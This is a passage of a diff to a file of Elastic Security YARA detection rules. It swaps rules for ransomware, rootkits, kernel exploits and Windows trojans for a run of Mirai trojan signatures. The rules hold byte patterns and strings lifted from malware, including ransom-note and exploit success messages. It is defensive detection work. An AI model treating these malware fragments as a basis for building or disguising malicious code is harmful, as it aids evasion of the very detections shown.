"f28b9b311296fc587eced94ca0d80fc60ee22344e5c38520ab161d9f1273e328" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a = { 41 56 41 55 41 54 49 89 FD 55 53 48 63 DE 48 83 EC 08 0F B6 17 80 } + $a = { 59 08 AA 3A 4C D3 6C 2E 6E F7 24 54 32 7C 61 39 65 21 66 74 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Quantum_8513Fb8B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Da4Aa3B3 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Quantum (Linux.Ransomware.Quantum)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "8513fb8b-43f7-46b1-8318-5549a7609d3b" - date = "2023-07-28" - modified = "2024-02-13" + id = "da4aa3b3-521d-4fde-b1be-c381d28c701c" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Quantum.yar#L1-L20" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3bcb9ad92fdca53195f390fc4d8d721b504b38deeda25c1189a909a7011406c9" - logic_hash = "7e24be541bafc2427ecd8f76b7774fb65d7421bc300503eeb068b8104e168c70" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L358-L376" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "dbc246032d432318f23a4c1e5b6fcd787df29da3bf418613f588f758dcd80617" + logic_hash = "84ddc505d2e2be955b88a0fe3b78d435f73c0a315b513e105933e84be78ba2ad" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "1c1af76ab5df8243b8e25555f1762749ca60da56fecea9d4131c612358244525" + fingerprint = "8b004abc37f47de6e4ed35284c23db0f6617eec037a71ce92c10aa8efc3bdca5" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102076,29 +102564,28 @@ rule ELASTIC_Linux_Ransomware_Quantum_8513Fb8B : FILE MEMORY os = "linux" strings: - $a1 = "All your files are encrypted on all devices across the network" - $a2 = "process with pid %d is blocking %s, going to kill it" + $a = { 01 D0 C1 E0 03 89 C2 8B 45 A0 01 D0 0F B6 40 14 3C 1F 77 65 8B } condition: all of them } -rule ELASTIC_Linux_Rootkit_Fontonlake_8Fa41F5E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_70Ef58F1 : FILE MEMORY { meta: - description = "Detects Linux Rootkit Fontonlake (Linux.Rootkit.Fontonlake)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "8fa41f5e-d03d-4647-86fb-335e056c1c0d" - date = "2021-10-12" - modified = "2022-01-26" + id = "70ef58f1-ac74-4e33-ae03-e68d1d5a4379" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Rootkit_Fontonlake.yar#L1-L26" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "826222d399e2fb17ae6bc6a4e1493003881b1406154c4b817f0216249d04a234" - logic_hash = "e90ace26dd74ae948d2469c6f532af5ec3070a21092f8b2c4d47c4f5b9d04c09" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L378-L396" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fc8741f67f39e7409ab2c6c62d4f9acdd168d3e53cf6976dd87501833771cacb" + logic_hash = "3ad201d643e8f93a6f9075c03a76020d78186702a19bf9174b08688a2e94ef5c" score = 75 - quality = 50 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "187aae8e659061a06b44e0d353e35e22ada9076c78d8a7e4493e1e4cc600bc9d" + fingerprint = "c46eac9185e5f396456004d1e0c42b54a9318e0450f797c55703122cfb8fea89" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102106,35 +102593,28 @@ rule ELASTIC_Linux_Rootkit_Fontonlake_8Fa41F5E : FILE MEMORY os = "linux" strings: - $a1 = "kernel_write" fullword - $a2 = "/proc/.dot3" fullword - $a3 = "hide_pid" fullword - $h2 = "s_hide_pids" fullword - $h3 = "s_hide_tcp4_ports" fullword - $h4 = "s_hide_strs" fullword - $tmp1 = "/tmp/.tmH" fullword - $tmp2 = "/tmp/.tmp_" fullword + $a = { 89 D0 8B 19 01 D8 0F B6 5C 24 10 30 18 89 D0 8B 19 01 D8 0F B6 5C } condition: - ( all of ($a*) and 1 of ($tmp*)) or ( all of ($h*)) + all of them } -rule ELASTIC_Linux_Rootkit_Arkd_Bbd56917 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Ea584243 : FILE MEMORY { meta: - description = "Detects Linux Rootkit Arkd (Linux.Rootkit.Arkd)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "bbd56917-aeab-4e73-b85b-adc41fc7ffe4" + id = "ea584243-6ead-4b96-9a5c-5b5dee12fd57" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Rootkit_Arkd.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e0765f0e90839b551778214c2f9ae567dd44838516a3df2c73396a488227a600" - logic_hash = "5e1ce9c37d92222e21b43f9e5f3275a70c6e8eb541c3762f9382c5d5c72fb50d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L398-L416" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "f363d9bd2132d969cd41e79f29c53ef403da64ca8afc4643084cc50076ddfb47" + logic_hash = "34c6f800c849c295797cdd971fb4f3d16d680530f9a98c291388345569708208" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "73c8b2685b6b568575afca3c3c2fe2095d94f2040f4a1207974fe77bbb657163" + fingerprint = "cbcabf4cba48152b3599570ef84503bfb8486db022a2b10df7544d4384023355" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102142,28 +102622,28 @@ rule ELASTIC_Linux_Rootkit_Arkd_Bbd56917 : FILE MEMORY os = "linux" strings: - $a = { 7D 0B B8 FF FF FF FF EB 11 8D 74 26 00 39 C1 7F 04 31 C0 EB 05 B8 01 00 } + $a = { 01 00 00 0E 00 00 00 18 03 00 7F E9 38 32 C9 4D 04 9A 3C 81 FA } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2014_3153_1C1E02Ad : FILE MEMORY CVE_2014_3153 +rule ELASTIC_Linux_Trojan_Mirai_564B8Eda : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2014 3153 (Linux.Exploit.CVE-2014-3153)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "1c1e02ad-eb06-4eb6-a424-0f1dd6eebb2a" + id = "564b8eda-6f0e-45b8-bef6-d61b0f090a36" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2014_3153.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "64b8c61b73f0c0c0bd44ea5c2bcfb7b665fcca219dbe074a4a16ae20cd565812" - logic_hash = "42e9de7f306343c4c3e7fd02b414b429faacb837fb2910f98f0c1519da40074c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L418-L436" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ff04921d7bf9ca01ae33a9fc0743dce9ca250e42a33547c5665b1c9a0b5260ee" + logic_hash = "4bf11492f480911629623250146554f2456f3a527f5f80402ef74b22c1460462" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2014-3153" - fingerprint = "a0a82cd15713be3f262021d6ed6572a0d4763ccfd0499e6b9374764c89705c2a" + tags = "FILE, MEMORY" + fingerprint = "63a9e43902e7db0b7a20498b5a860e36201bacc407e9e336faca0b7cfbc37819" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102171,100 +102651,57 @@ rule ELASTIC_Linux_Exploit_CVE_2014_3153_1C1E02Ad : FILE MEMORY CVE_2014_3153 os = "linux" strings: - $a = { 55 48 89 E5 48 83 EC 40 48 89 7D C8 48 8D 4D D0 48 8B 45 C8 BA 24 00 } + $a = { 83 FE 01 76 12 0F B7 07 83 EE 02 48 83 C7 02 48 01 C1 83 FE 01 } condition: all of them } -rule ELASTIC_Linux_Exploit_CVE_2021_3490_D369D615 : FILE MEMORY CVE_2021_3490 +rule ELASTIC_Linux_Trojan_Mirai_7E9F85Fb : FILE MEMORY { meta: - description = "Detects Linux Exploit Cve 2021 3490 (Linux.Exploit.CVE-2021-3490)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "d369d615-d2a3-4f9d-b5c7-eb0fac5d43e7" - date = "2021-11-12" - modified = "2022-01-26" + id = "7e9f85fb-bfc4-4af6-9315-f6e43fefc4ff" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_CVE_2021_3490.yar#L1-L30" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e65ba616942fd1e893e10898d546fe54458debbc42e0d6826aff7a4bb4b2cf19" - logic_hash = "6fa4b36366d2c255f5ccf0e22a06c7e17df74fddd06963787dbcd713b3e8aca6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L438-L456" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4333e80fd311b28c948bab7fb3f5efb40adda766f1ea4bed96a8db5fe0d80ea1" + logic_hash = "f4ce912e190bc5dcb56541f54ba8e47b6103c482bdc7e83b44693d2c066c0170" score = 75 quality = 75 - tags = "FILE, MEMORY, CVE-2021-3490" - fingerprint = "4f8f4c7fabe32a023f8aafb817e2c27c5a5e0e9246ddccacf99a47f2ab850014" - severity = 100 - arch_context = "x86" - scan_context = "file, memory" - license = "Elastic License v2" - os = "linux" - - strings: - $c1 = "frame_dummy_init_array_entry" - $c2 = "leak_oob_map_ptr" - $c3 = "overwrite_cred" - $c4 = "obj_get_info_by_fd" - $c5 = "kernel_write_uint" - $c6 = "search_init_pid_ns_kstrtab" - $c7 = "search_init_pid_ns_ksymtab" - $msg1 = "failed to leak ptr to BPF map" - $msg2 = "preparing to overwrite creds..." - $msg3 = "success! enjoy r00t" - $msg4 = "Useage: %s " - $msg5 = "searching for init_pid_ns in ksymtab" - - condition: - 4 of them -} -rule ELASTIC_Windows_Trojan_Phoreal_66E91De3 : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Phoreal (Windows.Trojan.Phoreal)" - author = "Elastic Security" - id = "66e91de3-a510-4a64-b03d-5385ceb32360" - date = "2022-02-16" - modified = "2022-04-12" - reference = "https://www.elastic.co/security-labs/phoreal-malware-targets-the-southeast-asian-financial-sector" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Phoreal.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "88f073552b30462a00d1d612b1638b0508e4ef02c15cf46203998091f0aef4de" - logic_hash = "c68131fd5e0272d3d473db387a186056a38e6611925ae448d5b668022e6e163a" - score = 75 - quality = 73 tags = "FILE, MEMORY" - fingerprint = "36c9150137b3d65ea6127abe54571f7346c5ebffd1966bf0a9ff99406fe5aa24" + fingerprint = "ef420ec934e3fd07d5c154a727ed5c4689648eb9ccef494056fed1dea7aa5f9c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 5C 00 5C 00 2E 00 5C 00 70 00 69 00 70 00 65 00 5C 00 7B 00 41 00 30 00 36 00 46 00 31 00 37 00 36 00 46 00 2D 00 37 00 39 00 46 00 31 00 2D 00 34 00 37 00 33 00 45 00 2D 00 41 00 46 00 34 00 34 00 2D 00 39 00 37 00 36 00 33 00 45 00 33 00 43 00 42 00 33 00 34 00 45 00 35 00 7D 00 } - $a2 = { 4C 00 6F 00 63 00 61 00 6C 00 5C 00 7B 00 35 00 46 00 42 00 43 00 33 00 46 00 35 00 33 00 2D 00 41 00 37 00 36 00 44 00 2D 00 34 00 32 00 34 00 38 00 2D 00 39 00 36 00 39 00 41 00 2D 00 33 00 31 00 37 00 34 00 30 00 43 00 42 00 43 00 38 00 41 00 44 00 36 00 7D 00 } - $a3 = { 7B 46 44 35 46 38 34 34 37 2D 36 35 37 41 2D 34 35 43 31 2D 38 39 34 42 2D 44 35 33 33 39 32 36 43 39 42 36 36 7D 2E 64 6C 6C } - $b1 = { 8B FF 55 8B EC 56 E8 3F 3E 00 00 E8 34 3E 00 00 50 E8 14 3E 00 00 85 C0 75 2A 8B 75 08 56 E8 21 } + $a = { 85 50 FF FF FF 0F B6 40 04 3C 07 75 79 48 8B 85 50 FF FF FF } condition: - 2 of them + all of them } -rule ELASTIC_Linux_Trojan_Subsevux_E9E80C1E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3A85A418 : FILE MEMORY { meta: - description = "Detects Linux Trojan Subsevux (Linux.Trojan.Subsevux)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "e9e80c1e-c064-47cf-91f2-0561dd5c9bcd" - date = "2021-04-06" + id = "3a85a418-2bd9-445a-86cb-657ca7edf566" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Subsevux.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4ccd399ea99d4e31fbf2bbf8017c5368d29e630dc2985e90f07c10c980fa084" - logic_hash = "8bc38f26da5a3350cbae3e93b890220bb461ff77e83993a842f68db8f757e435" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L458-L476" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "86a43b39b157f47ab12e9dc1013b4eec0e1792092d4cef2772a21a9bf4fc518a" + logic_hash = "bd7fe497fb2557c9e9c26ec90e783f03cbbc9bdaa8d20b364ce65edf6c1e5fa3" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bbd7a2d80e545d0cae7705a53600f6b729918a3d655bc86b2db83f15d4e550e3" + fingerprint = "554aff5770bfe8fdeae94f5f5a0fd7f7786340a95633433d8e686af1c25b8cec" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -102272,338 +102709,316 @@ rule ELASTIC_Linux_Trojan_Subsevux_E9E80C1E : FILE MEMORY os = "linux" strings: - $a = { 89 C0 89 45 F4 83 7D F4 00 79 1C 83 EC 0C 68 } + $a = { 01 D8 66 C1 C8 08 C1 C8 10 66 C1 C8 08 66 83 7C 24 2C FF 89 } condition: all of them } -rule ELASTIC_Windows_Hacktool_Sharpapplocker_9645Cf22 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_24C5B7D6 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpapplocker (Windows.Hacktool.SharpAppLocker)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "9645cf22-f9b3-45ff-a5d8-513c59ad3d53" - date = "2022-11-20" - modified = "2023-01-11" + id = "24c5b7d6-1aa8-4d8e-9983-c7234f57c3de" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpAppLocker.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0f7390905abc132889f7b9a6d5b42701173aafbff5b8f8882397af35d8c10965" - logic_hash = "cb72ecf7715b288acddac51dab091d84c64e3bd30276cba38a0d773e6693875c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L478-L496" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7c2f8ba2d6f1e67d1b4a3a737a449429c322d945d49dafb9e8c66608ab2154c4" + logic_hash = "f790f6b8fcf932773054525ed74a3f15998d91a2626ae9c56486de8dabc2035c" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "720a96f7baa8af4e6189709ee906350c291e175ac861c83d425b235d9217bb32" + fingerprint = "3411b624f02dd1c7a0e663f1f119c8d5e47a81892bb7c445b7695c605b0b8ee2" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid = "FE102D27-DEC4-42E2-BF69-86C79E08B67D" ascii wide nocase - $print_str0 = "[+] Output written to:" ascii wide fullword - $print_str1 = "[!] You can only select one Policy at the time." ascii wide fullword - $print_str2 = "SharpAppLocker.exe --effective --allow --rules=\"FileHashRule,FilePathRule\" --outfile=\"C:\\Windows\\Tasks\\Rules.json\"" ascii wide fullword + $a = { 54 38 1C 80 FA 3E 74 25 80 FA 3A 74 20 80 FA 24 74 1B 80 FA 23 } condition: - $guid or all of ($print_str*) + all of them } -rule ELASTIC_Windows_Ransomware_Darkside_D7Fc4594 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_99D78950 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Darkside (Windows.Ransomware.Darkside)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "d7fc4594-185c-4afb-986e-5718c0beabf1" - date = "2021-05-20" - modified = "2021-10-04" + id = "99d78950-ea23-4166-a85a-7a029209f5b1" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Darkside.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bfb31c96f9e6285f5bb60433f2e45898b8a7183a2591157dc1d766be16c29893" - logic_hash = "0083fb64955973e7dbbb35d08cb780fa0b4ff4d064c102dc8f86e29af8358bad" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L498-L516" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6" + logic_hash = "bfd628a9973f85ed0a8be2723c7ff4bd028af00ea98c9cbcde9df6aabcf394b2" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "90444cd2d3a38296b4979f91345a9999b0032f6c0abee6ff7c15d149b59e5e88" + fingerprint = "3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 5F 30 55 56 BD 0A 00 00 00 8B 07 8B 5F 10 8B 4F 20 8B 57 30 } + $a = { 10 89 C3 80 BC 04 83 00 00 00 20 0F 94 C0 8D B4 24 83 00 00 00 25 FF 00 } condition: - any of them + all of them } -rule ELASTIC_Windows_Ransomware_Darkside_Aceac5D9 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_3Fe3C668 : FILE MEMORY { meta: - description = "Detects Windows Ransomware Darkside (Windows.Ransomware.Darkside)" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "aceac5d9-fb38-4dca-ab1f-44ee40005d37" - date = "2021-05-20" - modified = "2021-10-04" + id = "3fe3c668-89f4-4601-a167-f41bbd984ae5" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Darkside.yar#L21-L39" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bfb31c96f9e6285f5bb60433f2e45898b8a7183a2591157dc1d766be16c29893" - logic_hash = "888ab06b55b07879ee6b9a45c04f1a09c570aeb4be55c698300566d57fd47252" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L518-L535" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "e75b2dca7de7d9f31a0ae5940dc45d0e6d0f1ca110b5458fc99912400da97bde" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "521b0f574b27151ad03fc7693fd692e1a13e81a28e39d04d3f7ea149a0da59b9" + fingerprint = "2a79caea707eb0ecd740106ea4bed2918e7592c1e5ad6050f6f0992cf31ba5ec" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 41 54 55 53 48 83 EC 28 48 8B 1F 4C 8B 66 08 48 8D 7C 24 10 4C } + $a = { 00 84 C0 0F 95 C0 48 FF 45 E8 84 C0 75 E9 8B 45 FC C9 C3 55 48 } condition: - any of them + all of them } -rule ELASTIC_Windows_Ransomware_Phobos_A5420148 : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_Eedfbfc6 : FILE MEMORY { meta: - description = "Identifies Phobos ransomware" - author = "Elastic Security" - id = "a5420148-2f80-4a14-8a0d-98943fcbe784" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Phobos.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "9fcfe41102bee4f8ecf19f30d0bbb2de50e1a1aff4e17c587b5d9adb417527c5" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" + author = "Elastic Security" + id = "eedfbfc6-98a4-4817-a0d6-dcb065307f5c" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L537-L555" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b7342f7437a3a16805a7a8d4a667e0e018584f9a99591413650e05d21d3e6da6" + logic_hash = "949b32db1a00570fc84fbbe510f57f6e898d089efd3fedbd7719f8059021b6bc" score = 75 quality = 75 - tags = "BETA, FILE, MEMORY" - fingerprint = "2b3937dbecb9a12e5e276c681eb40cb3884411a048175fcfe1bd4be3f7611aca" - threat_name = "Windows.Ransomware.Phobos" + tags = "FILE, MEMORY" + fingerprint = "c79058b4a40630cb4142493062318cdfda881259ac95b70d977816f85b82bb36" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 61 00 63 00 75 00 74 00 65 00 00 00 61 00 63 00 74 00 69 00 6E 00 00 00 61 00 63 00 74 00 6F 00 6E 00 00 00 61 00 63 00 74 00 6F 00 72 00 00 00 61 00 63 00 75 00 66 00 66 00 00 } - $a2 = { 0C 6D 00 73 00 66 00 74 00 65 00 73 00 71 00 6C 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 61 00 67 00 65 00 6E 00 74 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 62 00 72 00 6F 00 77 00 73 00 65 00 72 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 73 00 65 00 72 00 76 00 72 00 2E 00 65 00 78 00 65 00 00 00 73 00 71 00 6C 00 77 00 72 00 69 00 74 00 65 00 72 00 2E 00 65 00 78 00 65 00 00 00 6F 00 72 00 61 00 63 00 6C 00 65 00 2E 00 65 00 78 00 } - $a3 = { 31 00 63 00 64 00 00 00 33 00 64 00 73 00 00 00 33 00 66 00 72 00 00 00 33 00 67 00 32 00 00 00 33 00 67 00 70 00 00 00 37 00 7A 00 00 00 61 00 63 00 63 00 64 00 61 00 00 00 61 00 63 00 63 00 64 00 62 00 00 00 61 00 63 00 63 00 64 00 63 00 00 00 61 00 63 00 63 00 64 00 65 00 00 00 61 00 63 00 63 00 64 00 74 00 00 00 61 00 63 00 63 00 64 00 77 00 00 00 61 00 64 00 62 00 00 00 61 00 64 00 70 00 00 00 61 00 69 00 00 00 61 00 69 00 33 00 00 00 61 00 69 00 34 00 00 00 61 00 69 00 35 00 00 00 61 00 69 00 36 00 00 00 61 00 69 00 37 00 00 00 61 00 69 00 38 00 00 00 61 00 6E 00 69 00 6D 00 00 00 61 00 72 00 77 00 00 00 61 00 73 00 00 00 61 00 73 00 61 00 00 00 61 00 73 00 63 00 00 00 61 00 73 00 63 00 78 00 00 00 61 00 73 00 6D 00 00 00 61 00 73 00 6D 00 78 00 00 00 61 00 73 00 70 00 00 00 61 00 73 00 70 00 78 00 00 00 61 00 73 00 72 00 00 00 61 00 73 00 78 00 00 00 61 00 76 00 69 00 00 00 61 00 76 00 73 00 00 00 62 00 61 00 63 00 6B 00 75 00 70 00 00 00 62 00 61 00 6B 00 00 00 62 00 61 00 79 00 00 00 62 00 64 00 00 00 62 00 69 00 6E 00 00 00 62 00 6D 00 70 00 00 00 } + $a = { 7C 39 57 52 AC 57 A8 CE A8 8C FC 53 A8 A8 0E 33 C2 AA 38 14 FB 29 } condition: - 2 of ($a*) + all of them } -rule ELASTIC_Windows_Ransomware_Phobos_Ff55774D : BETA FILE MEMORY +rule ELASTIC_Linux_Trojan_Mirai_6D96Ae91 : FILE MEMORY { meta: - description = "Identifies Phobos ransomware" + description = "Detects Linux Trojan Mirai (Linux.Trojan.Mirai)" author = "Elastic Security" - id = "ff55774d-4425-4243-8156-ce029c1d5860" - date = "2020-06-25" - modified = "2021-08-23" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.phobos" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Ransomware_Phobos.yar#L24-L43" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "9ee41b9638a8cc1d9f9b254878c935c531b2f599be59550b3617b1de8cba2ba5" + id = "6d96ae91-9d5c-48f1-928b-1562b120a74d" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mirai.yar#L557-L575" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = 